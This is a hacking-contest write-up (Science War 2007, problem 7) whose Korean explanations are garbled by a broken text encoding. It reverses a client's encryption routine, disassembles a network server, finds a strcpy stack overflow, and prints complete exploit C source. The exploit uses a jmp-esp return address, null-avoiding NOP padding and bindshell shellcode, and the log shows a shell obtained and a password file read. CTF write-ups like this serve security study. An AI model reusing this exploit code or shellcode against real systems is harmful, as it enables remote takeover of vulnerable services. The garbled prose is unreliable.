--------------------------------
Science War 2007
	KAIST vs POSTECH
	POSTECH vs KAIST

л ŷȸ 7 Ǯ
--------------------------------
-> writer   - hkpco           <-
-> mail&msn - hkpco@korea.com <-
-> homepage - http://hkpco.kr <-
================================
http://sciencewar.wowhacker.org/
================================

* ȸ غⰣ  ð    7 Ͽ  ֽ ̿, 赿Բ 帳ϴ.


ī(or ī) ŷȸ 7  б  Ǯ̸ Ͽϴ.
 Ʒ ϴ.

--
Ư  Ʈ ڰ Է ͸ ϴ  α׷ hackko.exe ֽϴ.
 ־  ּҴ "218.38.54.227" ̸ Ʈ 31337Դϴ.
ش  ͸ ϸ  ȣȭ ƾ ļ  Ŭ̾Ʈ(hackko.exe) ݴϴ.
׷ hackko.exe ڰ Է ͸ "218.38.54.227" Ȱ ȣȭ ƾ  մϴ.
ȣȭ "POSTECH" or "KAIST" , "KAIST" or "POSTECH" ڿ  ϰ Ǹ,
 ̳ʸ ġ URL  ְԵ˴ϴ.

http://218.38.54.227/~hkpco/hackko.exe
let's go.
--

  α׷ urlԴϴ.
--------------------------------------------------------
binary - http://hkpco.joinc.co.kr/science_war/hackko.exe
--------------------------------------------------------

  ý ȯԴϴ.
------------------------------------------------------------------------------------
[hkpco@ns science_war]$ uname -a
Linux ns.joinc.co.kr 2.4.34 #2 Sat Jan 27 11:45:33 KST 2007 i686 i686 i386 GNU/Linux
[hkpco@ns science_war]$ cat /etc/redhat-release
Red Hat Linux release 9 (Shrike)
------------------------------------------------------------------------------------

켱 ־ MFC̳ʸ hackko.exe ϸ "ּ, Ʈ, " Է¹޽ϴ.
ּҿ Ʈ   ̸ ־ְ, ʹ ڰ Ƿ ۼϿ    ֽϴ.
hackko.exe ڰ Է ͸ α׷  ȣȭ ƾ  Ư  Ʈ  ݴϴ.
ǰ ִ  hackko.exe α׷ Ȱ ȣȭ ƾ Ѵٰ   ξ,
ȣȭ "KAIST" or "POSTECH" ڿ ϸ  ̳ʸ ġ url   شٰ  ˷ ־ϴ.
MFC̳ʸ ȣȭ ƾ ã ȣȭ ƾ   "KAIST" or "POSTECH" ȣȭ  ϸ
 ̳ʸ ġ ּҸ ǵ ݴϴ.

 , hackko.exeα׷   ϸ  ͸ α׷ Ư Ʈ ̻   մϴ.
׷, netcat ̳  α׷    ȣȭ ڵ带 ̿Ͽ ͸  ־ մϴ.

ollydbg  ˾Ƴ cryptionԼ callԴϴ.
------------------------------------------------
00401795   . E8 56FEFFFF    CALL hackko.004015F0
------------------------------------------------

ȣȭ ƾ Ʒ ϴ.
-----------------------------------------------------------
004015F0  /$ B8 00280000    MOV EAX,2800
004015F5  |. E8 D6040000    CALL hackko.00401AD0
004015FA  |. 8B9424 0428000>MOV EDX,DWORD PTR SS:[ESP+2804]
00401601  |. 57             PUSH EDI
00401602  |. 8BFA           MOV EDI,EDX
.
.
.
0040164F  |> 881428         |MOV BYTE PTR DS:[EAX+EBP],DL
00401652  |. 8A50 01        |MOV DL,BYTE PTR DS:[EAX+1]
00401655  |. 47             |INC EDI
00401656  |. 40             |INC EAX
00401657  |. 84D2           |TEST DL,DL
00401659  |.^75 D6          \JNZ SHORT hackko.00401631
.
.
00401677  |. 5F             POP EDI
00401678  |. 81C4 00280000  ADD ESP,2800
0040167E  \. C3             RETN
-----------------------------------------------------------


 ȣȭ ƾ   ȣȭ ڵԴϴ.
----------------------------------------------------------
cryption - http://hkpco.joinc.co.kr/science_war/cryption.c
----------------------------------------------------------

cryption  Դϴ.
-----------------------------------------------------------------------------
[hkpco@ns science_war]$ (perl -e 'print "hkpco_korean"') | nc localhost 31337
s`{XzTvd}Zl

[hkpco@ns science_war]$ ./cryption hkpco_korean
t_|W{Swc~Ymb
[hkpco@ns science_war]$ ./cryption hkpco_korean | nc localhost 31337
hkpco_korean
-----------------------------------------------------------------------------


cryption ̿Ͽ ڿ ȣȭ   ϰ Ǹ ȣȭ Ͱ  ƿ ˴ϴ.
KAIST, POSTECH ȣȭ      ̳ʸ url   Դϴ.

---------------------------------------------------------------
[hkpco@ns science_war]$ ./cryption KAIST | nc localhost 31337
http://hkpco.joinc.co.kr/science_war/server
KAIST

[hkpco@ns science_war]$ ./cryption POSTECH | nc localhost 31337
http://hkpco.joinc.co.kr/science_war/server
POSTECH
---------------------------------------------------------------


  url ġ ̳ʸ ޾ мϰڽϴ.

[hkpco@localhost hk]$ wget http://hkpco.joinc.co.kr/science_war/server
--17:43:41--  http://hkpco.joinc.co.kr/science_war/server
           => `server'
Resolving hkpco.joinc.co.kr... 218.234.19.87
Connecting to hkpco.joinc.co.kr|218.234.19.87|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,007 (15K) [text/plain]

100%[=================================================================================>] 15,007        --.--K/s

17:43:41 (4.92 MB/s) - `server' saved [15007/15007]

[hkpco@localhost hk]$ objdump -d server

server:     file format elf32-i386

Disassembly of section .init:

0804856c <_init>:
 804856c:       55                      push   %ebp
 804856d:       89 e5                   mov    %esp,%ebp
 804856f:       83 ec 08                sub    $0x8,%esp
 8048572:       e8 b1 01 00 00          call   8048728 <call_gmon_start>
 8048577:       e8 0c 02 00 00          call   8048788 <frame_dummy>
 804857c:       e8 b7 07 00 00          call   8048d38 <__do_global_ctors_aux>
.
.
.
080487b4 <main>:
 80487b4:       55                      push   %ebp
 80487b5:       89 e5                   mov    %esp,%ebp
 80487b7:       81 ec 18 15 00 00       sub    $0x1518,%esp
 80487bd:       83 e4 f0                and    $0xfffffff0,%esp
 80487c0:       b8 00 00 00 00          mov    $0x0,%eax
 80487c5:       29 c4                   sub    %eax,%esp
 80487c7:       c7 85 fc ea ff ff 01    movl   $0x1,0xffffeafc(%ebp)
 80487ce:       00 00 00
 80487d1:       c7 85 f8 ea ff ff 02    movl   $0x2,0xffffeaf8(%ebp)
 80487d8:       00 00 00
 80487db:       8b 85 fc ea ff ff       mov    0xffffeafc(%ebp),%eax
.
.
 8048ac7:       e8 e8 fa ff ff          call   80485b4 <close@plt>
 8048acc:       83 c4 10                add    $0x10,%esp
 8048acf:       83 ec 0c                sub    $0xc,%esp
 8048ad2:       ff b5 c0 eb ff ff       pushl  0xffffebc0(%ebp)
 8048ad8:       e8 d7 fa ff ff          call   80485b4 <close@plt>
 8048add:       83 c4 10                add    $0x10,%esp
 8048ae0:       b8 00 00 00 00          mov    $0x0,%eax
 8048ae5:       c9                      leave
 8048ae6:       c3                      ret

08048ae7 <decryption>:
 8048ae7:       55                      push   %ebp
 8048ae8:       89 e5                   mov    %esp,%ebp
 8048aea:       57                      push   %edi
 8048aeb:       81 ec 24 28 00 00       sub    $0x2824,%esp
 8048af1:       8d bd f8 d7 ff ff       lea    0xffffd7f8(%ebp),%edi
 8048af7:       fc                      cld
 8048af8:       ba 00 00 00 00          mov    $0x0,%edx
 8048afd:       b8 00 0a 00 00          mov    $0xa00,%eax
.
.
.
 8048d61:       e8 00 00 00 00          call   8048d66 <_fini+0xa>
 8048d66:       5b                      pop    %ebx
 8048d67:       81 c3 c6 11 00 00       add    $0x11c6,%ebx
 8048d6d:       e8 da f9 ff ff          call   804874c <__do_global_dtors_aux>
 8048d72:       8b 5d fc                mov    0xfffffffc(%ebp),%ebx
 8048d75:       c9                      leave
 8048d76:       c3                      ret


server̳ʸ  κ ƮԴϴ.

 804899c:       83 ec 04                sub    $0x4,%esp
 804899f:       6a 20                   push   $0x20
 80489a1:       6a 00                   push   $0x0
 80489a3:       8d 45 d8                lea    0xffffffd8(%ebp),%eax
 80489a6:       50                      push   %eax
 80489a7:       e8 18 fd ff ff          call   80486c4 <memset@plt>
 80489ac:       83 c4 10                add    $0x10,%esp
// memset( %eax(ebp-28) , 0x0 , 0x20 );

 80489af:       83 ec 04                sub    $0x4,%esp
 80489b2:       68 01 14 00 00          push   $0x1401
 80489b7:       6a 00                   push   $0x0
 80489b9:       8d 85 c8 eb ff ff       lea    0xffffebc8(%ebp),%eax
 80489bf:       50                      push   %eax
 80489c0:       e8 ff fc ff ff          call   80486c4 <memset@plt>
 80489c5:       83 c4 10                add    $0x10,%esp
// memset( %eax(ebp-1438) , 0x0 , 0x1401 );

.
.

 80489ea:       6a 00                   push   $0x0
 80489ec:       68 00 14 00 00          push   $0x1400
 80489f1:       8d 85 c8 eb ff ff       lea    0xffffebc8(%ebp),%eax
 80489f7:       50                      push   %eax
 80489f8:       ff b5 c0 eb ff ff       pushl  0xffffebc0(%ebp)
 80489fe:       e8 d1 fc ff ff          call   80486d4 <recv@plt>
 8048a03:       83 c4 10                add    $0x10,%esp
// recv( %ebp(0xffffebc0) , %eax(ebp-1438) , 0x1400 , 0x0 );

.
.

 8048a31:       83 ec 08                sub    $0x8,%esp
 8048a34:       83 ec 04                sub    $0x4,%esp
 8048a37:       8d 85 c8 eb ff ff       lea    0xffffebc8(%ebp),%eax
 8048a3d:       50                      push   %eax
 8048a3e:       e8 a4 00 00 00          call   8048ae7 <decryption>
 8048a43:       83 c4 08                add    $0x8,%esp
 8048a46:       50                      push   %eax
 8048a47:       8d 45 d8                lea    0xffffffd8(%ebp),%eax
 8048a4a:       50                      push   %eax
 8048a4b:       e8 a4 fc ff ff          call   80486f4 <strcpy@plt>
 8048a50:       83 c4 10                add    $0x10,%esp
// strcpy( ebp-24 , decryption(ebp-1438) );


Ʈ  غ  ϴ.

--
socket(..);
bind(..);
listen(..);

while(1)
{
	accept(..);

	memset( %eax(ebp-40) , 0x0 , 0x20 );
	memset( %eax(ebp-5176) , 0x0 , 0x1401 );

	recv( %ebp(0xffffebc0) , %eax(ebp-1438) , 0x1400 , 0x0 );
	strcpy( ebp-36 , decryption(ebp-5176) );
}

send(..);
--

socket, bind, listen, accept Ͽ   , buffer(ebp-36, ebp-5176) ʱȭ  ,
recvԼ   (ebp-5176) ִ 0x1400ũ ͸ ޾ƿɴϴ.
׸   ۸ decryptionԼ ȣȭ   ebp-36 ϰ Ǵ  BOF ߻մϴ.

 Ǳ ؼ bruteforce õؾ  ۰ ۱  return address ޺κп ϴ 
ų  ڵ( bindshell, reverse telnet  )    bruteforce ؾ մϴ.
  ̳ʸ ڼ 캸 Ǹ ѹ  ų  ִ Ǹ ã  ֽϴ.

----------------------------------------------------
 80487e9:       ff e4                   jmp    *%esp
----------------------------------------------------

  ̳ʸ ο jmp *%esp  ϴµ, ̸ ̿ϸ   ų  ֽϴ.
payload   մϴ.

-----------------------------------
[buffer][ret][....]
[AAA...AA][jmp_esp addr][bindshell]
-----------------------------------

return address jmp_esp ġ ּҰ ְ,  ڿ bindshellڵ带 ϰ Ǹ ڽμ Ҹκп
jmp_esp Ǿ esp ( ⼭ esp return address   Ű  )ϰ Ǿ
bindshell ڵ带   Դϴ.   jmp esp  ڼ  ϰڽϴ.

   Ȯ payload  ,
ebp-36 ϴ buffer overflow Ͼ   44Ʈ ͸ Ͽ ebp ä  ֽϴ.
return address jmp_esp ּҰ 0x80487e9 ־  , ٷ ڿ bindshellڵ带 մϴ.
׷ 44Ʈ Ͱ ebp , jmp_esp ġ ּҰ  esp ϰ Ǵµ  
bindshellڵ尡 ġ ̸,     ų  ִ Ư Ʈ ְ ˴ϴ.

׷ EXPLOITۼ  ؾ   ֽϴ.
ȣȭ ڵ带 ̿Ͽ ͸ ȣȭ   ߰ nullڰ Ե  ִµ, sendԼ ۵ ̸
strlen(cryption(data))   ϸ nullbyte data  ̷ νϹǷ ü payload
   ϴ.
sendԼ ־ ̰  ũ ־  Ǵ,  Ŭ̾Ʈ  ۹ ͸
 descryptionԼ ȣȭ ϰ Ǵµ, ⼭ strlenԼ ϱ    ̿ 
nullڸ   νϰԵǹǷ ڵ ü    Ե˴ϴ.

⿡  ذå ã ؼ ȣȭ ڵ Ư Ģ ľ , ڵ带 籸 ؾ մϴ.
cryption data() ̿  ȣȭ Ǵ Ͱ ޶ Դϴ.
׷ٸ payload ̸ 1byte Ű  ̰  Ģ ȣȭ    nullbyte
   Դϴ. payload Ʒ  ˴ϴ.

[AAA..AA][jmp_esp addr][bindshell]
-> cryption nullbyte ԵǴ°?,

׷ٸ payload籸, ƴϸ 

[AAA..AA][jmp_esp addr][NOP][bindshell]
-> cryption nullbyte ԵǴ°?,

׷ٸ payload籸, ƴϸ 

[AAA..AA][jmp_esp addr][NOPNOP][bindshell]
-> cryption nullbyte ԵǴ°?,

׷ٸ payload籸, ƴϸ 
.
.
.

bindshellպκп NOP 1byte Ű cryption  nullbyte ԵǴ üũմϴ.
nullbyte Ȯνÿ   Ϲ ڿ Լ ϸ ȵȴٴ Դϴ.
ڿ Լ ⺻ nullbyte      Ϳ  ̿Ͽ Ȯ ؾ մϴ.
nullbyteüũ   Լ  ϴ.

int check_null( char *get_p, int l )
{
	int i, length;
	char *p, c;
	p = get_p;

	length = l;
	printf( "payload: %dbyte\n" , length );

	for( i = 0 ; i < length ; i++ )
	{
		c = *p++;
		if( c == 0 )
		{
			printf( "\t [null found]\n\n" );
			return 1;
		}
	}
	printf("\n");
	return 0;
}

cryption ͸ ͷ Ѱܹ , 1byte ϸ nullbyte  Ǵմϴ.
 , ι° ڿ cryption () ̸ ް Ǵµ,  ־ ȣȭ/ȣȭ ƾ 
򹮰 ȣ ̰ 1:1  ϹǷ nullbyte Ե  ڵ() ̸ Ѱִ Դϴ.

check_null()Լ ߰   ٽɺ ڵ  ϴ.

do
{
	memset( dummy , '\x90' , cnt++ );
	snprintf( payload , sizeof(payload) -1 , "%s%s%s%s" , buffer , jmp_esp , dummy , bindsc );

	#ifdef DEBUG
		printf( "A: %d\n" , strlen(cryption(payload)));
		printf( "B: %d\n" , strlen(payload));
	#endif
} while(check_null( cryption(payload) , strlen(payload) ));


check_null()Լ nullbyte ϸ 1  ֹǷ ȣȭ Ϳ nullbyte Ե  
ݺ  ǰ ˴ϴ. dummy ͵  nullbyte    1byte ߰˴ϴ.

̷ ۼ  EXPLOIT ̿  Դϴ.
EXPLOIT ڷδ ebp ä  dummy size Էմϴ.
⼭ dummy size տ  44byteԴϴ.

--
[hkpco@ns science_war]$ gcc -o hkexp hkexp.c
[hkpco@ns science_war]$ ./hkexp 44

        payload: 258byte
                 [null found]


        payload: 259byte

================
exploit success!
================

id
uid=511(hkpco) gid=513(hkpco) groups=513(hkpco)

ls -al
total 36
drwxrwxr-x    2 hkpco    hkpco        4096 Sep 16 00:39 .
drwxrwxr-x    3 hkpco    hkpco        4096 Sep 16 16:51 ..
-rw-rw-r--    1 hkpco    hkpco          13 Sep 16 00:40 PASSWORD
-rwxrwxr-x    1 hkpco    hkpco       23766 Sep 16 00:39 server

cat PASSWORD
ChanAm, Park
--

н "ChanAm, Park" Դϴ.


-----------------------------------------------------------------------------------------------
ġ..
--------
	̾𽺿 ŷȸ غ ΰ  ð Ͽϴ.
	ȸⰣ   Ǯֽ POSTECH & KAIST, KAIST & POSTECH е鲲 帮,
	       ִ ִ ̾ϴ.
	⿣    ãƺ˰ڽϴ.
	մϴ.
-----------------------------------------------------------------------------------------------

=============================================
SERVER SOURCE CODE
http://hkpco.joinc.co.kr/science_war/server.c
=============================================

======================================================
EXPLOIT source code
hkexp.c - http://hkpco.joinc.co.kr/science_war/hkexp.c
======================================================

- hkexp.c -
/*
	Science War Hacking Contest
	problem7 EXPLOIT by hkpco

	KAIST vs POSTECH
	POSTECH vs KAIST
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define ADR "127.0.0.1"
#define TG_PORT 31337
#define RS_PORT 45295
//#define DEBUG

char payload[4096*2] = {0x00,};
char buffer[1024] = {0x00,};
char jmp_esp[] = "\xe9\x87\x04\x08"; // jmp_esp addr
char bindsc[] =	"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
		"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
		"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
		"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53\x89\xe2\xb3\x10\x53\xb3\x02"
		"\x52\x51\x89\xca\x89\xe1\xb0\x66\xcd\x80\x31\xdb\x39\xc3\x74\x05"
		"\x31\xc0\x40\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb3\x04\xb0\x66\xcd"
		"\x80\x89\xd7\x31\xc0\x31\xdb\x31\xc9\xb3\x11\xb1\x01\xb0\x30\xcd"
		"\x80\x31\xc0\x31\xdb\x50\x50\x57\x89\xe1\xb3\x05\xb0\x66\xcd\x80"
		"\x89\xc6\x31\xc0\x31\xdb\xb0\x02\xcd\x80\x39\xc3\x75\x40\x31\xc0"
		"\x89\xfb\xb0\x06\xcd\x80\x31\xc0\x31\xc9\x89\xf3\xb0\x3f\xcd\x80"
		"\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0\x41\xb0\x3f\xcd\x80\x31\xc0"
		"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8b\x54\x24"
		"\x08\x50\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x31\xc0"
		"\x89\xf3\xb0\x06\xcd\x80\xeb\x99"; // bindshell code

char *cryption( char *data );
int attack_check( void );
void socket_shell( int sockfd );
int check_null( char *get_p, int l );

int main( int argc , char **argv )
{
	int sockfd, cnt;
	char dummy[512]={0x00,};
	struct sockaddr_in sock;

	if( argc < 2 )
	{
		fprintf( stderr , "i need dummy size\n" );
		return -1;
	}

	sockfd = socket( PF_INET , SOCK_STREAM , 0 );
	if( sockfd < 0 )
	{
		perror( "socket()" );
		return -1;
	}

	sock.sin_family = AF_INET;
	sock.sin_addr.s_addr = inet_addr(ADR);
	sock.sin_port = htons(TG_PORT);

	if( (connect( sockfd , (struct sockaddr *)&sock , sizeof(sock))<0) )
	{
		perror( "connect()" );
		return -1;
	}

	cnt = 0;
	memset( buffer , 'A' , atoi(argv[1]) );
	do
	{
		memset( dummy , '\x90' , cnt++ );
		snprintf( payload , sizeof(payload) -1 , "%s%s%s%s" , buffer , jmp_esp , dummy , bindsc );

		#ifdef DEBUG
			printf( "A: %d\n" , strlen(cryption(payload)));
			printf( "B: %d\n" , strlen(payload));
		#endif
	} while(check_null( cryption(payload) , strlen(payload) ));

	send( sockfd , cryption(payload) , strlen(cryption(payload)) , 0 );

	usleep(7000);
	if( !attack_check() )
		printf( "! exploit failed !\n" );

	close(sockfd);
	return 0;
}

char *cryption( char *data )
{
	char output[4096*2]={0x00,}, fake_char;
	char *p, c;
	int n, i, fake_int;

	p = output;
	fake_int = n = strlen(data);
	i = 0;

	if( n%2 )
		n *= -1;

	while( data[i] )
	{
		if(i % 2)
			n *= -1;

		c = data[i] + n;

		if(i % 2)
			n *= -1;

		output[i++] = c;

		// fake
		fake_char = (data[i] + 72) % 128;
		if( fake_char )
			fake_char += 128;
		fake_int--;
	}
	output[i] = 0;
	return p;
}

int attack_check( void )
{
	int sockfd;
	struct sockaddr_in target_addr;

	target_addr.sin_family = AF_INET;
	target_addr.sin_port = htons(RS_PORT);
	target_addr.sin_addr.s_addr = inet_addr(ADR);
	bzero( &target_addr.sin_zero, 8 );

	sockfd = socket( AF_INET, SOCK_STREAM, 0 );
	if( sockfd < 0 )
	{
		perror( "connect(attack_check)" );
		return -1;
	}

	if( (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(target_addr))) == -1 )
	{
		close(sockfd);
		return 0;
	}
	else
	{
		printf( "================\n" );
		printf( "exploit success!\n" );
		printf( "================\n\n" );
		socket_shell(sockfd);
		return 1;
	}
}

void socket_shell( int sockfd )
{
	int length;
	static int flag;
	char data[4096 +1] = {0x00,};
	fd_set fds;

	flag = 0;
	while(1)
	{
		FD_ZERO(&fds);
		FD_SET( sockfd , &fds );
		FD_SET( 0 , &fds );

		select( sockfd +1 , &fds , NULL , NULL , NULL );

		if( FD_ISSET( sockfd , &fds ) )
		{
			memset( data , 0x0 , sizeof(data) );
			length = recv( sockfd , data , sizeof(data) -1 , 0 );

			if( length > 0 )
			{
				length = write( 1 , data , length );
				if( length < 0 )
					continue;
			}
		}
		if( FD_ISSET( 0 , &fds ) )
		{
			length = read( 0 , data , sizeof(data) -1 );
			if( send( sockfd , data , length , 0 ) < 0 )
				continue;
		}
	}
}

int check_null( char *get_p, int l )
{
	int i, length;
	char *p, c;
	p = get_p;

	length = l;
	printf( "\n\tpayload: %dbyte\n" , length );

	for( i = 0 ; i < length ; i++ )
	{
		c = *p++;
		if( c == 0 )
		{
			printf( "\t\t [null found]\n\n" );
			return 1;
		}
	}
	printf("\n");
	return 0;
}
